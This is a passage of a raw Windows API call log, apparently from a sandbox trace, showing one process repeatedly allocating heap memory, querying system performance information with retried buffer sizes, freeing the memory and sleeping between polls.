ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0305.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.376] Sleep (dwMilliseconds=0x110) [0305.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0305.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0305.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0305.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0305.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0305.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0305.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0305.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0305.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.391] Sleep (dwMilliseconds=0x110) [0305.403] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0305.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0305.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0305.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0305.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0305.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0305.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0305.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0305.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.410] Sleep (dwMilliseconds=0x110) [0305.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0305.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.420] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0305.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0305.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.420] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0305.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0305.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0305.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0305.421] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0305.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.422] Sleep (dwMilliseconds=0x110) [0305.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0305.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0305.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0305.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0305.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0305.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0305.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0305.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0305.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.441] Sleep (dwMilliseconds=0x110) [0305.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0305.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0305.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0305.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0305.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0305.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0305.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0305.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0305.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.471] Sleep (dwMilliseconds=0x110) [0305.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0305.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0305.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0305.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0305.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0305.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0305.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0305.492] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0305.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.493] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.493] Sleep (dwMilliseconds=0x110) [0305.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0305.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0305.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0305.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0305.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0305.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0305.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0305.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0305.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.501] Sleep (dwMilliseconds=0x110) [0305.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0305.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0305.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0305.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0305.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0305.521] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0305.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0305.521] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0305.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.523] Sleep (dwMilliseconds=0x110) [0305.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0305.554] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0305.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0305.600] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.601] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0305.601] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0305.601] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0305.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0305.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0305.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.609] Sleep (dwMilliseconds=0x110) [0305.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0305.678] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.679] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0305.679] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0305.679] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.680] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0305.680] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0305.680] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.681] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0305.682] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0305.682] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.682] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0305.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.688] Sleep (dwMilliseconds=0x110) [0305.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0305.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0305.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0305.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0305.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0305.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0305.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0305.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0305.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.706] Sleep (dwMilliseconds=0x110) [0305.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0305.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0305.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0305.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0305.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0305.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0305.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0305.725] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0305.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.726] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.726] Sleep (dwMilliseconds=0x110) [0305.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0305.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0305.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0305.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0305.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0305.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0305.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0305.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0305.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.736] Sleep (dwMilliseconds=0x110) [0305.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0305.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0305.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0305.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0305.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0305.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0305.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0305.752] 